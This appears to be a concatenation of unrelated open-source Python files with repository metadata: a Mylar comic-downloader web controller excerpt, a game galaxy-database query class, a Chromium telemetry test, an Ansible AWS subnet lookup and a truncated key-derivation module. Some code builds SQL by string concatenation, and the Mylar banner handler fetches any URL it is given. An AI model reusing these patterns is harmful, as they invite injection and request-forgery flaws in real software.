def torrentit(self, issueid=None, torrent_hash=None, download=False):
#make sure it's bool'd here.
if download == 'True':
download = True
else:
download = False
if mylar.CONFIG.AUTO_SNATCH is False:
logger.warn('Auto-Snatch is not enabled - this will ONLY work with auto-snatch enabled and configured. Aborting request.')
return 'Unable to complete request - please enable auto-snatch if required'
torrent_info = helpers.torrentinfo(issueid, torrent_hash, download)
if torrent_info:
torrent_name = torrent_info['name']
torrent_info['filesize'] = helpers.human_size(torrent_info['total_filesize'])
torrent_info['download'] = helpers.human_size(torrent_info['download_total'])
torrent_info['upload'] = helpers.human_size(torrent_info['upload_total'])
torrent_info['seedtime'] = helpers.humanize_time(amount=int(time.time()) - torrent_info['time_started'])
logger.info("Client: %s", mylar.CONFIG.RTORRENT_HOST)
logger.info("Directory: %s", torrent_info['folder'])
logger.info("Name: %s", torrent_info['name'])
logger.info("Hash: %s", torrent_info['hash'])
logger.info("FileSize: %s", torrent_info['filesize'])
logger.info("Completed: %s", torrent_info['completed'])
logger.info("Downloaded: %s", torrent_info['download'])
logger.info("Uploaded: %s", torrent_info['upload'])
logger.info("Ratio: %s", torrent_info['ratio'])
logger.info("Seeding Time: %s", torrent_info['seedtime'])
if torrent_info['label']:
logger.info("Torrent Label: %s", torrent_info['label'])
ti = '<table><tr><td>'
ti += '<center><b>' + torrent_name + '</b></center></br>'
if torrent_info['completed'] and download is True:
ti += '<br><center><tr><td>AUTO-SNATCH ENABLED: ' + torrent_info['snatch_status'] + '</center></td></tr>'
ti += '<tr><td><center>Hash: ' + torrent_info['hash'] + '</center></td></tr>'
ti += '<tr><td><center>Location: ' + os.path.join(torrent_info['folder'], torrent_name) + '</center></td></tr></br>'
ti += '<tr><td><center>Filesize: ' + torrent_info['filesize'] + '</center></td></tr>'
ti += '<tr><td><center>' + torrent_info['download'] + ' DOWN / ' + torrent_info['upload'] + ' UP</center></td></tr>'
ti += '<tr><td><center>Ratio: ' + str(torrent_info['ratio']) + '</center></td></tr>'
ti += '<tr><td><center>Seedtime: ' + torrent_info['seedtime'] + '</center></td></tr>'
ti += '</table>'
logger.info('torrent_info:%s' % torrent_info)
#commenting out the next 2 lines will return the torrent information to the screen
#fp = mylar.process.Process(torrent_info['filepath'], torrent_info['dst_folder'], issueid=torrent_info['issueid'], failed=failed)
#fp.post_process()
else:
torrent_name = 'Not Found'
ti = 'Torrent not found (' + str(torrent_hash) + ')'
return ti
torrentit.exposed = True
def get_the_hash(self, filepath):
import hashlib, StringIO
import rtorrent.lib.bencode as bencode
# Open torrent file
torrent_file = open(os.path.join(mylar.CONFIG.CACHE_DIR, filepath), "rb")
metainfo = bencode.decode(torrent_file.read())
torrent_file.close()
info = metainfo['info']
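# the BitTorrent info-hash is the SHA1 digest of the bencoded 'info' dictionary.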
thehash = hashlib.sha1(bencode.encode(info)).hexdigest().upper()
logger.info('Hash: ' + thehash)
get_the_hash.exposed = True
def download_0day(self, week):
logger.info('Now attempting to search for 0-day pack for week: %s' % week)
#week contains weekinfo['midweek'] = YYYY-mm-dd of Wednesday of the given week's pull
foundcom, prov = search.search_init('0-Day Comics Pack - %s.%s' % (week[:4],week[5:]), None, week[:4], None, None, week, week, None, allow_packs=True, oneoff=True)
download_0day.exposed = True
def test_32p(self, username, password):
import auth32p
tmp = auth32p.info32p(test={'username': username, 'password': password})
rtnvalues = tmp.authenticate()
if rtnvalues['status'] is True:
return json.dumps({"status": "Successfully Authenticated.", "inkdrops": mylar.INKDROPS_32P})
else:
return json.dumps({"status": "Could not Authenticate.", "inkdrops": mylar.INKDROPS_32P})
test_32p.exposed = True
def check_ActiveDDL(self):
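# report progress of the DDL entry currently marked 'Downloading' (if any) as JSON,
# comparing the size of the partial file on disk against the remote filesize.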
myDB = db.DBConnection()
active = myDB.selectone("SELECT * FROM DDL_INFO WHERE STATUS = 'Downloading'").fetchone()
if active is None:
return json.dumps({'status': 'There are no active downloads currently being attended to',
'percent': 0,
'a_series': None,
'a_year': None,
'a_filename': None,
'a_size': None,
'a_id': None})
else:
filelocation = os.path.join(mylar.CONFIG.DDL_LOCATION, active['filename'])
#logger.fdebug('checking file existance: %s' % filelocation)
if os.path.exists(filelocation) is True:
filesize = os.stat(filelocation).st_size
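# progress percentage = bytes currently on disk / reported remote filesize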
cmath = int(float(filesize*100)/int(int(active['remote_filesize'])*100) * 100)
#logger.fdebug('ACTIVE DDL: %s %s [%s]' % (active['filename'], cmath, 'Downloading'))
return json.dumps({'status': 'Downloading',
'percent': "%s%s" % (cmath, '%'),
'a_series': active['series'],
'a_year': active['year'],
'a_filename': active['filename'],
'a_size': active['size'],
'a_id': active['id']})
else:
# myDB.upsert('ddl_info', {'status': 'Incomplete'}, {'id': active['id']})
return json.dumps({'a_id': active['id'], 'status': 'File does not exist in %s.</br> This probably needs to be restarted (use the option in the GUI)' % filelocation, 'percent': 0})
check_ActiveDDL.exposed = True
def create_readlist(self, list=None, weeknumber=None, year=None):
# ({
# "PUBLISHER": weekly['PUBLISHER'],
# "ISSUE": weekly['ISSUE'],
# "COMIC": weekly['COMIC'],
# "STATUS": tmp_status,
# "COMICID": weekly['ComicID'],
# "ISSUEID": weekly['IssueID'],
# "HAVEIT": haveit,
# "LINK": linkit,
# "AUTOWANT": False
# })
issuelist = []
logger.info('weeknumber: %s' % weeknumber)
logger.info('year: %s' % year)
weeklyresults = []
if weeknumber is not None:
myDB = db.DBConnection()
w_results = myDB.select("SELECT * from weekly WHERE weeknumber=? AND year=?", [int(weeknumber),int(year)])
watchlibrary = helpers.listLibrary()
issueLibrary = helpers.listIssues(weeknumber, year)
oneofflist = helpers.listoneoffs(weeknumber, year)
for weekly in w_results:
xfound = False
tmp_status = weekly['Status']
issdate = None
if weekly['ComicID'] in watchlibrary:
haveit = watchlibrary[weekly['ComicID']]
if all([mylar.CONFIG.AUTOWANT_UPCOMING, tmp_status == 'Skipped']):
tmp_status = 'Wanted'
for x in issueLibrary:
if weekly['IssueID'] == x['IssueID']:
xfound = True
tmp_status = x['Status']
issdate = x['IssueYear']
break
else:
xlist = [x['Status'] for x in oneofflist if x['IssueID'] == weekly['IssueID']]
if xlist:
haveit = 'OneOff'
tmp_status = xlist[0]
issdate = None
else:
haveit = "No"
x = None
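# issue numbers are normally numeric; non-numeric designations such as '2AU' or
# '3.NOW' are accepted as-is below.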
try:
x = float(weekly['ISSUE'])
except ValueError, e:
if 'au' in weekly['ISSUE'].lower() or 'ai' in weekly['ISSUE'].lower() or '.inh' in weekly['ISSUE'].lower() or '.now' in weekly['ISSUE'].lower() or '.mu' in weekly['ISSUE'].lower() or '.hu' in weekly['ISSUE'].lower():
x = weekly['ISSUE']
if x is not None:
weeklyresults.append({
"PUBLISHER": weekly['PUBLISHER'],
"ISSUE": weekly['ISSUE'],
"COMIC": weekly['COMIC'],
"STATUS": tmp_status,
"COMICID": weekly['ComicID'],
"ISSUEID": weekly['IssueID'],
"HAVEIT": haveit,
"ISSUEDATE": issdate
})
weeklylist = sorted(weeklyresults, key=itemgetter('PUBLISHER', 'COMIC'), reverse=False)
for ab in weeklylist:
if ab['HAVEIT'] == ab['COMICID']:
lb = myDB.selectone('SELECT ComicVersion, Type, ComicYear from comics WHERE ComicID=?', [ab['COMICID']]).fetchone()
issuelist.append({'IssueNumber': ab['ISSUE'],
'ComicName': ab['COMIC'],
'ComicID': ab['COMICID'],
'IssueID': ab['ISSUEID'],
'Status': ab['STATUS'],
'Publisher': ab['PUBLISHER'],
'ComicVolume': lb['ComicVersion'],
'ComicYear': lb['ComicYear'],
'ComicType': lb['Type'],
'IssueYear': ab['ISSUEDATE']})
from mylar import cbl
ab = cbl.dict2xml(issuelist)
#a = cbl.CreateList(issuelist)
#ab = a.createComicRackReadlist()
logger.info('returned.')
logger.info(ab)
create_readlist.exposed = True
def downloadBanner(self, **kwargs):
storyarcid = kwargs['storyarcid']
url = kwargs['url']
storyarcname = kwargs['storyarcname']
logger.info('storyarcid: %s' % storyarcid)
logger.info('url: %s' % url)
ext = url[-4:]
for i in ['.jpg', '.png', '.jpeg']:
if i in url:
ext = i
break
banner = os.path.join(mylar.CONFIG.CACHE_DIR, 'storyarcs', (str(storyarcid) + '-banner' + ext))
r = requests.get(url, stream=True)
if str(r.status_code) != '200':
logger.warn('Unable to download image from URL: %s [Status Code returned:%s]' % (url, r.status_code))
else:
if r.headers.get('Content-Encoding') == 'gzip':
import gzip
from StringIO import StringIO
buf = StringIO(r.content)
f = gzip.GzipFile(fileobj=buf)
with open(banner, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
f.flush()
logger.info('Successfully wrote image to cache directory: %s' % banner)
import get_image_size
image = get_image_size.get_image_metadata(banner)
imageinfo = json.loads(get_image_size.Image.to_str_json(image))
logger.info('imageinfo: %s' % imageinfo)
raise cherrypy.HTTPRedirect("detailStoryArc?StoryArcID=%s&StoryArcName=%s" % (storyarcid, storyarcname))
downloadBanner.exposed = True
def manageBanner(self, comicid, action, height=None, width=None):
rootpath = os.path.join(mylar.CONFIG.CACHE_DIR, 'storyarcs')
if action == 'delete':
deleted = False
ext = ['.jpg', '.png', '.jpeg']
loc = os.path.join(rootpath, str(comicid) + '-banner')
for x in ['.jpg', '.png', '.jpeg']:
if os.path.isfile(loc +x):
os.remove(loc+x)
deleted = True
break
if deleted is True:
logger.info('Successfully deleted banner image for the given storyarc.')
else:
logger.warn('Unable to locate banner image in cache folder...')
elif action == 'save':
filepath = None
dir = os.listdir(rootpath)
for fname in dir:
if str(comicid) in fname:
ext = os.path.splitext(fname)[1]
filepath = os.path.join(rootpath, fname)
break
#if 'H' in fname:
# bannerheight = fname[fname.find('H')+1:fname.find('.')]
# logger.info('bannerheight found at : %s' % bannerheight)
#ext = ['.jpg', '.png', '.jpeg']
#ext = None
#loc = os.path.join(mylar.CONFIG.CACHE_DIR, 'storyarcs', str(comicid) + '-banner')
#for x in ['.jpg', '.png', '.jpeg']:
# if os.path.isfile(loc +x):
# ext = x
# break
if filepath is not None:
os.rename(filepath, os.path.join(rootpath, (str(comicid) + '-bannerH' + str(height) + ext)))
logger.info('successfully saved %s to new dimensions of banner : 960 x %s' % (str(comicid) + '-bannerH' + str(height) + ext, height))
else:
logger.warn('unable to locate %s in cache directory in order to save' % filepath)
manageBanner.exposed = True
def choose_specific_download(self, **kwargs): #manual=True):
try:
action = kwargs['action']
except:
action = False
try:
comicvolume = kwargs['comicvolume']
except:
comicvolume = None
if all([kwargs['issueid'] != 'None', kwargs['issueid'] is not None]) and action is False:
issueid = kwargs['issueid']
logger.info('checking for: %s' % issueid)
results = search.searchforissue(issueid, manual=True)
else:
results = self.queueissue(kwargs['mode'], ComicName=kwargs['comicname'], ComicID=kwargs['comicid'], IssueID=kwargs['issueid'], ComicIssue=kwargs['issue'], ComicVersion=comicvolume, Publisher=kwargs['publisher'], pullinfo=kwargs['pullinfo'], pullweek=kwargs['pullweek'], pullyear=kwargs['pullyear'], manual=True)
myDB = db.DBConnection()
r = []
for x in mylar.COMICINFO: #results:
ctrlval = {'provider': x['provider'],
'id': x['nzbid']}
newval = {'kind': x['kind'],
'sarc': x['SARC'],
'issuearcid': x['IssueArcID'],
'comicname': x['ComicName'],
'comicid': x['ComicID'],
'issueid': x['IssueID'],
'issuenumber': x['IssueNumber'],
'volume': x['ComicVolume'],
'oneoff': x['oneoff'],
'fullprov': x['nzbprov'],
'modcomicname': x['modcomicname'],
'name': x['nzbtitle'],
'link': x['link'],
'size': x['size'],
'pack_numbers': x['pack_numbers'],
'pack_issuelist': x['pack_issuelist'],
'comicyear': x['comyear'],
'issuedate': x['IssueDate'],
'tmpprov': x['tmpprov'],
'pack': x['pack']}
myDB.upsert('manualresults', newval, ctrlval)
r.append({'kind': x['kind'],
'provider': x['provider'],
'nzbtitle': x['nzbtitle'],
'nzbid': x['nzbid'],
'size': x['size'][:-1],
'tmpprov': x['tmpprov']})
#logger.fdebug('results returned: %s' % r)
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(r)
choose_specific_download.exposed = True
def download_specific_release(self, nzbid, provider, name):
myDB = db.DBConnection()
dsr = myDB.selectone('SELECT * FROM manualresults WHERE id=? AND tmpprov=? AND name=?', [nzbid, provider, name]).fetchone()
if dsr is None:
logger.warn('Unable to locate result - something is wrong. Try and manually search again?')
return
else:
oneoff = bool(int(dsr['oneoff']))
try:
pack = bool(int(dsr['pack']))
except:
pack = False
comicinfo = [{'ComicName': dsr['comicname'],
'ComicVolume': dsr['volume'],
'IssueNumber': dsr['issuenumber'],
'comyear': dsr['comicyear'],
'IssueDate': dsr['issuedate'],
'pack': pack,
'modcomicname': dsr['modcomicname'],
'oneoff': oneoff,
'SARC': dsr['sarc'],
'IssueArcID': dsr['issuearcid']}]
#logger.info('comicinfo: %s' % comicinfo)
newznabinfo = None
if dsr['kind'] == 'usenet':
link = dsr['link']
for newznab_info in mylar.CONFIG.EXTRA_NEWZNABS:
if dsr['provider'].lower() in newznab_info[0].lower():
if (newznab_info[5] == '1' or newznab_info[5] == 1):
if newznab_info[1].endswith('/'):
newznab_host = newznab_info[1]
else:
newznab_host = newznab_info[1] + '/'
newznab_api = newznab_info[3]
newznab_uid = newznab_info[4]
link = str(newznab_host) + 'api?apikey=' + str(newznab_api) + '&t=get&id=' + str(dsr['id'])
logger.info('newznab detected as : ' + str(newznab_info[0]) + ' @ ' + str(newznab_host))
logger.info('link : ' + str(link))
newznabinfo = (newznab_info[0], newznab_info[1], newznab_info[2], newznab_info[3], newznab_info[4])
else:
logger.error(str(newznab_info[0]) + ' is not enabled - unable to process retry request until provider is re-enabled.')
break
else:
link = nzbid
if oneoff is True:
mode = 'pullwant'
else:
mode = 'series'
try:
nzbname = search.nzbname_create(dsr['fullprov'], info=comicinfo, title=dsr['name'])
sresults = search.searcher(dsr['fullprov'], nzbname, comicinfo, link=link, IssueID=dsr['issueid'], ComicID=dsr['comicid'], tmpprov=dsr['tmpprov'], directsend=True, newznab=newznabinfo)
if sresults is not None:
updater.foundsearch(dsr['ComicID'], dsr['IssueID'], mode='series', provider=dsr['tmpprov'], hash=sresults['t_hash'])
except:
return False #json.dumps({'result': 'failure'})
else:
return True #json.dumps({'result': 'success'})
download_specific_release.exposed = True
def read_comic(self, ish_id, page_num, size):
from mylar.webviewer import WebViewer
wv = WebViewer()
page_num = int(page_num)
#cherrypy.session['ishid'] = ish_id
data = wv.read_comic(ish_id, page_num, size)
#data = wv.read_comic(ish_id)
return data
read_comic.exposed = True
|
evilhero/mylar
|
mylar/webserve.py
|
Python
|
gpl-3.0
| 350,353
|
# -*- coding: utf-8 -*-
import sqlite3
class GalaxyDB:
PLANET_TYPE_PLANET = 1
PLANET_TYPE_BASE = 5
def __init__(self):
self._conn = sqlite3.connect('galaxy5.db')
self._conn.row_factory = sqlite3.Row
self._cur = self._conn.cursor()
self._log_queries = False
def create_query(self, where_clause=None, sort_col=None, sort_order=None):
q = 'SELECT g,s,p, \n' \
' planet_id, planet_name, planet_type, planet_metal, planet_crystal, planet_destroyed, \n' \
' luna_id, luna_name, luna_diameter, luna_destroyed, \n' \
' user_id, user_name, user_rank, user_onlinetime, user_banned, user_ro, user_race, \n' \
' ally_id, ally_name, ally_tag, ally_members \n' \
' FROM planets'
if where_clause is not None:
q += ' \n'
q += where_clause
# sort, order
q += '\n ORDER BY '
# fix invalid input
if sort_order is not None:
if sort_order not in ['asc', 'desc']:
sort_order = None
if sort_col is not None:
if sort_col not in ['planet_name', 'planet_type', 'user_name', 'user_rank', 'ally_name', 'luna_name']:
sort_col = None
# append sorting
if sort_col is not None:
q += sort_col
if sort_order is not None:
q += ' '
q += sort_order
q += ', '
q += 'g ASC, s ASC, p ASC' # by default, always sort by coords
# log query
if self._log_queries:
try:
with open('queries.log', mode='at', encoding='UTF-8') as f:
f.write(q)
f.write('\n')
except IOError:
pass
return q
@staticmethod
def safe_int(val):
if val is None:
return 0
try:
r = int(val)
except ValueError:
r = 0
return r
@staticmethod
def safe_str(val):
if val is None:
return ''
return str(val)
def _rows_to_res_list(self):
rows_list = []
rows = self._cur.fetchall()
for row in rows:
r = dict()
r['coords'] = '[{0}:{1}:{2}]'.format(row['g'], row['s'], row['p'])
r['coords_link'] = '<a href="http://uni5.xnova.su/galaxy/{3}/{4}/" target="_blank">' \
'[{0}:{1}:{2}]</a>'.format(row['g'], row['s'], row['p'],
row['g'], row['s'])
r['planet_id'] = GalaxyDB.safe_int(row['planet_id'])
r['planet_name'] = GalaxyDB.safe_str(row['planet_name'])
r['planet_type'] = GalaxyDB.safe_int(row['planet_type'])
r['user_id'] = GalaxyDB.safe_int(row['user_id'])
r['user_name'] = GalaxyDB.safe_str(row['user_name'])
r['user_rank'] = GalaxyDB.safe_int(row['user_rank'])
r['user_onlinetime'] = GalaxyDB.safe_int(row['user_onlinetime'])
r['user_banned'] = GalaxyDB.safe_int(row['user_banned'])
r['user_ro'] = GalaxyDB.safe_int(row['user_ro'])
# fix user name to include extra data
user_flags = ''
if r['user_ro'] > 0:
user_flags += 'U'
if r['user_banned'] > 0:
user_flags += 'G'
if r['user_onlinetime'] == 1:
user_flags += 'i'
if r['user_onlinetime'] == 2:
user_flags += 'I'
if user_flags != '':
r['user_name'] += ' (' + user_flags + ')'
# user race and race icon
r['user_race'] = GalaxyDB.safe_int(row['user_race'])
r['user_race_img'] = '<img border="0" src="css/icons/race{0}.png" width="18" />'.format(r['user_race'])
r['ally_name'] = GalaxyDB.safe_str(row['ally_name'])
r['ally_tag'] = GalaxyDB.safe_str(row['ally_tag'])
r['ally_members'] = GalaxyDB.safe_int(row['ally_members'])
# process ally info
if r['ally_tag'] != r['ally_name']:
r['ally_name'] += ' [{0}]'.format(r['ally_tag'])
            r['ally_name'] += ' ({0} members)'.format(r['ally_members'])
if r['ally_members'] == 0:
r['ally_name'] = ''
r['luna_name'] = GalaxyDB.safe_str(row['luna_name'])
r['luna_diameter'] = GalaxyDB.safe_int(row['luna_diameter'])
# process luna
if (r['luna_name'] != '') and (r['luna_diameter'] > 0):
r['luna_name'] += ' ({0})'.format(r['luna_diameter'])
# process planet type (detect bases)
if r['planet_type'] == GalaxyDB.PLANET_TYPE_BASE:
r['planet_name'] += ' (base)'
rows_list.append(r)
res_dict = dict()
res_dict['rows'] = rows_list
return res_dict
def query_like(self, col_name, value, sort_col=None, sort_order=None):
if type(col_name) == str:
where = 'WHERE ' + col_name + ' LIKE ?'
params = (value, )
elif type(col_name) == list:
where = 'WHERE'
params = list()
for col in col_name:
where += ' '
where += col
where += ' LIKE ? OR'
params.append(value)
where = where[0:-2]
else:
where = None
params = None
q = self.create_query(where, sort_col, sort_order)
self._cur.execute(q, params)
return self._rows_to_res_list()
def query_inactives(self, user_flags, gal_ints, s_min, s_max, min_rank=0, sort_col=None, sort_order=None):
user_where = ''
gals_where = ''
syss_where = ''
rank_where = ''
# user flags
# user online time
user_ot = ''
if 'i' in user_flags:
user_ot = 'user_onlinetime=1'
if 'I' in user_flags:
user_ot = 'user_onlinetime>0'
user_where += user_ot
        # user banned or not banned, exclusively set
if 'G' in user_flags:
if user_where != '':
user_where += ' AND '
user_where += 'user_banned>0'
else:
if user_where != '':
user_where += ' AND '
user_where += 'user_banned=0'
# user ro or not, exclusively
if 'U' in user_flags:
if user_where != '':
user_where += ' AND '
user_where += 'user_ro>0'
else:
if user_where != '':
user_where += ' AND '
user_where += 'user_ro=0'
# galaxies
if type(gal_ints) == list:
gals_where = 'g IN ('
for g in gal_ints:
gals_where += '{0},'.format(g)
gals_where = gals_where[0:-1]
gals_where += ')'
# systems
if s_min <= s_max:
syss_where = 's BETWEEN {0} AND {1}'.format(s_min, s_max)
# rank
if min_rank > 0:
rank_where = ' AND (user_rank BETWEEN 1 AND {0})'.format(min_rank)
# final WHERE clause
where = 'WHERE ({0}) AND ({1}) AND ({2}) {3}'.format(user_where, gals_where, syss_where, rank_where)
q = self.create_query(where, sort_col, sort_order)
self._cur.execute(q)
return self._rows_to_res_list()
def query_planets_count(self, gal: int, sys_: int) -> int:
self._cur.execute('SELECT COUNT(*) FROM planets WHERE g=? AND s=?', (gal, sys_))
rows = self._cur.fetchall()
assert len(rows) == 1
assert len(rows[0]) == 1
return self.safe_int(rows[0][0])
def query_player_planets(self, player_name: str) -> list:
q = 'SELECT g,s,p, planet_name, planet_type, luna_name, luna_diameter \n' \
' FROM planets WHERE user_name=?'
self._cur.execute(q, (player_name,))
ret = []
for row in self._cur.fetchall():
p = dict()
p['g'] = GalaxyDB.safe_int(row['g'])
p['s'] = GalaxyDB.safe_int(row['s'])
p['p'] = GalaxyDB.safe_int(row['p'])
p['planet_name'] = GalaxyDB.safe_str(row['planet_name'])
p['planet_type'] = GalaxyDB.safe_int(row['planet_type'])
p['luna_name'] = GalaxyDB.safe_str(row['luna_name'])
p['luna_diameter'] = GalaxyDB.safe_int(row['luna_diameter'])
ret.append(p)
return ret
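# Illustrative sketch (not part of the original module): typical read-only usage of
# GalaxyDB; the '%ghost%' pattern and the searched column list are hypothetical.
def _example_search_players():
    db = GalaxyDB()
    return db.query_like(['user_name', 'planet_name'], '%ghost%',
                         sort_col='user_rank', sort_order='asc')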
|
minlexx/xnova_galaxy_parser
|
site_uni5/classes/galaxy_db.py
|
Python
|
gpl-3.0
| 8,514
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
import unittest
from telemetry.core import browser_finder
from telemetry.unittest import options_for_unittests
class BrowserTest(unittest.TestCase):
def setUp(self):
self._browser = None
def CreateBrowser(self,
extra_browser_args=None,
profile_type=None):
assert not self._browser
options = options_for_unittests.GetCopy()
if profile_type:
# TODO(jeremy): crbug.com/243912 profiles are only implemented on
# Desktop.
is_running_on_desktop = not (
options.browser_type.startswith('android') or
options.browser_type.startswith('cros'))
if not is_running_on_desktop:
logging.warn("Desktop-only test, skipping.")
return None
options.profile_type = profile_type
if extra_browser_args:
options.extra_browser_args.extend(extra_browser_args)
browser_to_create = browser_finder.FindBrowser(options)
if not browser_to_create:
raise Exception('No browser found, cannot continue test.')
self._browser = browser_to_create.Create()
unittest_data_dir = os.path.join(os.path.dirname(__file__),
'..', '..', 'unittest_data')
self._browser.SetHTTPServerDirectories(unittest_data_dir)
return self._browser
def tearDown(self):
if self._browser:
self._browser.Close()
def testBrowserCreation(self):
b = self.CreateBrowser()
self.assertEquals(1, len(b.tabs))
# Different browsers boot up to different things.
assert b.tabs[0].url
def testCommandLineOverriding(self):
# This test starts the browser with --user-agent=telemetry. This tests
# whether the user agent is then set.
flag1 = '--user-agent=telemetry'
b = self.CreateBrowser(extra_browser_args=[flag1])
t = b.tabs[0]
t.Navigate(b.http_server.UrlOf('blank.html'))
t.WaitForDocumentReadyStateToBeInteractiveOrBetter()
self.assertEquals(t.EvaluateJavaScript('navigator.userAgent'),
'telemetry')
def testVersionDetection(self):
b = self.CreateBrowser()
v = b._browser_backend._inspector_protocol_version # pylint: disable=W0212
self.assertTrue(v > 0)
v = b._browser_backend._chrome_branch_number > 0 # pylint: disable=W0212
self.assertTrue(v > 0)
def testNewCloseTab(self):
b = self.CreateBrowser()
if not b.supports_tab_control:
logging.warning('Browser does not support tab control, skipping test.')
return
existing_tab = b.tabs[0]
self.assertEquals(1, len(b.tabs))
existing_tab_url = existing_tab.url
new_tab = b.tabs.New()
self.assertEquals(2, len(b.tabs))
self.assertEquals(existing_tab.url, existing_tab_url)
self.assertEquals(new_tab.url, 'about:blank')
new_tab.Close()
self.assertEquals(1, len(b.tabs))
self.assertEquals(existing_tab.url, existing_tab_url)
def testMultipleTabCalls(self):
b = self.CreateBrowser()
b.tabs[0].Navigate(b.http_server.UrlOf('blank.html'))
b.tabs[0].WaitForDocumentReadyStateToBeInteractiveOrBetter()
def testTabCallByReference(self):
b = self.CreateBrowser()
tab = b.tabs[0]
tab.Navigate(b.http_server.UrlOf('blank.html'))
b.tabs[0].WaitForDocumentReadyStateToBeInteractiveOrBetter()
def testCloseReferencedTab(self):
b = self.CreateBrowser()
if not b.supports_tab_control:
logging.warning('Browser does not support tab control, skipping test.')
return
b.tabs.New()
tab = b.tabs[0]
tab.Navigate(b.http_server.UrlOf('blank.html'))
tab.Close()
self.assertEquals(1, len(b.tabs))
def testDirtyProfileCreation(self):
b = self.CreateBrowser(profile_type = 'small_profile')
# TODO(jeremy): crbug.com/243912 profiles are only implemented on Desktop
if not b:
return
self.assertEquals(1, len(b.tabs))
|
pozdnyakov/chromium-crosswalk
|
tools/telemetry/telemetry/core/browser_unittest.py
|
Python
|
bsd-3-clause
| 4,041
|
# (c) 2015, Jon Hadfield <jon@lessknown.co.uk>
"""
Description: This lookup takes an AWS region and a list of one or more
subnet names and returns a list of matching subnet ids.
Example Usage:
{{ lookup('aws_subnet_ids_from_names', ('eu-west-1', ['subnet1', 'subnet2'])) }}
"""
from ansible import errors
try:
import boto.vpc
except ImportError:
raise errors.AnsibleError("aws_subnet_ids_from_names lookup cannot be run without boto installed")
class LookupModule(object):
def __init__(self, basedir=None, **kwargs):
self.basedir = basedir
def run(self, terms, inject=None, **kwargs):
if isinstance(terms, basestring):
terms = [terms]
subnet_ids = []
region = terms[0]
subnet_names = terms[1]
vpc_conn = boto.vpc.connect_to_region(region)
        filters = {'tag:Name': subnet_names}
subnets = vpc_conn.get_all_subnets(filters=filters)
subnet_ids = [x.id.encode('utf-8') for x in subnets]
return subnet_ids
|
jonhadfield/ansible-lookups
|
v1/aws_subnet_ids_from_names.py
|
Python
|
mit
| 1,007
|
"""
Database crypto.
"""
import binascii
from sqlalchemy import func, and_
from sqlalchemy.orm.exc import NoResultFound, MultipleResultsFound
from Crypto.Random import get_random_bytes
from Crypto.Protocol.KDF import PBKDF2
from ensconce import model, exc
from ensconce.model import meta
from ensconce.crypto import engine, state, MasterKey, CombinedMasterKey
from ensconce.autolog import log
def configure_crypto_state(passphrase):
"""
    Convenience function to set up the shared crypto state using the specified passphrase.
This function assumes that the metadata for this key has already been initialized.
:raise ensconce.exc.MissingKeyMetadata: If the metadata row does not exist yet.
:raise ensconce.exc.MultipleKeyMetadata: If there are multiple metadata rows.
:raise ensconce.exc.UnconfiguredModel: If we can't create an SA session.
"""
key = derive_configured_key(passphrase)
# TODO: Consider moving the key validation in here instead.
state.secret_key = key
def derive_configured_key(passphrase):
"""
Derives a key with specified passphrase and stored salt using PBKDF2 algorithm.
:param passphrase: A passphrase string of any length, will be used to create the keys.
:type passphrase: str
:return: The encryption and signing key set.
:rtype: ensconce.crypto.MasterKey
:raise ensconce.exc.MissingKeyMetadata: If the metadata row does not exist yet.
:raise ensconce.exc.MultipleKeyMetadata: If there are multiple metadata rows.
:raise ensconce.exc.UnconfiguredModel: If we can't create an SA session.
"""
if isinstance(passphrase, unicode):
passphrase = passphrase.encode("utf-8")
if not isinstance(passphrase, str):
raise TypeError("Passphrase must be bytestring.")
if meta.Session is None:
raise exc.UnconfiguredModel()
# We assume that the mission is to look up an existing key.
session = meta.Session()
try:
key_info = session.query(model.KeyMetadata).one()
salt = key_info.kdf_salt
except NoResultFound:
raise exc.MissingKeyMetadata()
except MultipleResultsFound:
raise exc.CryptoError("Multiple key metadata rows are not supported.")
return derive_key(passphrase, salt)
def derive_key(passphrase, salt):
"""
Creates a key from passphrase and salt using PBKDF2.
:param passphrase: A passphrase string of any length, will be used to create the keys.
:type passphrase: str
:param salt: The initialization salt. This does not need to be kept secret, but should
be different for each installation of the software to protect against
                 precomputed-hash attacks (rainbow tables). The standard recommends this
be at least 64-bits, so we will throw an exception if it is smaller.
:type salt: str
:return: The encryption and signing key set.
:rtype: ensconce.crypto.MasterKey
"""
if isinstance(passphrase, unicode):
passphrase = passphrase.encode("utf-8")
if not isinstance(passphrase, str):
raise TypeError("Passphrase must be bytestring.")
if not isinstance(salt, str):
raise TypeError("Salt must be bytestring.")
if len(salt) < 8:
raise ValueError("Salt must be at least 64 bits (8 bytes).")
return CombinedMasterKey(PBKDF2(passphrase, salt, dkLen=64))
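# Illustrative sketch (not part of the original module): how derive_key() above might be
# exercised with a freshly generated salt; the 16-byte salt length is an assumption, the
# docstring above only requires at least 8 bytes (64 bits).
def _example_derive_key():
    salt = get_random_bytes(16)  # random per-installation salt, kept alongside the key metadata
    key = derive_key("correct horse battery staple", salt)
    return key, salt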
def load_secret_key_file(secret_key_file):
"""
Loads a secret key from a file and initializes the engine with this key.
This is designed for use in development/debugging and should NOT be used
in production, if you value the encrypted database data.
:param secret_key_file: The path to a file containing the 32-byte secret key.
:type secret_key_file: str
:raise ensconce.exc.CryptoNotInitialized: If the engine cannot be initialized.
"""
try:
with open(secret_key_file) as fp:
key_bytes = binascii.unhexlify(fp.read().strip())
log.info("Using DEBUG secret.key from file: {0}".format(secret_key_file))
try:
secret_key = CombinedMasterKey(key_bytes)
validate_key(key=secret_key)
except exc.MissingKeyMetadata:
log.info("Writng out DEBUG secret.key to key metadata row.")
initialize_key_metadata(key=secret_key, salt=get_random_bytes(16))
state.secret_key = secret_key
except:
log.exception("Unable to initialize secret key from file.")
raise exc.CryptoNotInitialized("Crypto engine has not been initialized.")
def validate_key(key):
"""
Checks the key against an encrypted blob in the database.
:param key: The master key to check.
:type key: ensconce.crypto.MasterKey
:raise ensconce.exc.MissingKeyMetadata: If the metadata row does not exist yet.
:raise ensconce.exc.MultipleKeyMetadata: If there are multiple metadata rows.
:raise ensconce.exc.UnconfiguredModel: If we can't create an SA session.
"""
if meta.Session is None:
raise exc.UnconfiguredModel()
session = meta.Session()
try:
key_info = session.query(model.KeyMetadata).one()
#log.debug("Got bytes for validation: {0!r}".format(key_info.validation))
try:
decrypted = engine.decrypt(key_info.validation, key=key)
#log.debug("Decrypts to: {0!r}".format(decrypted))
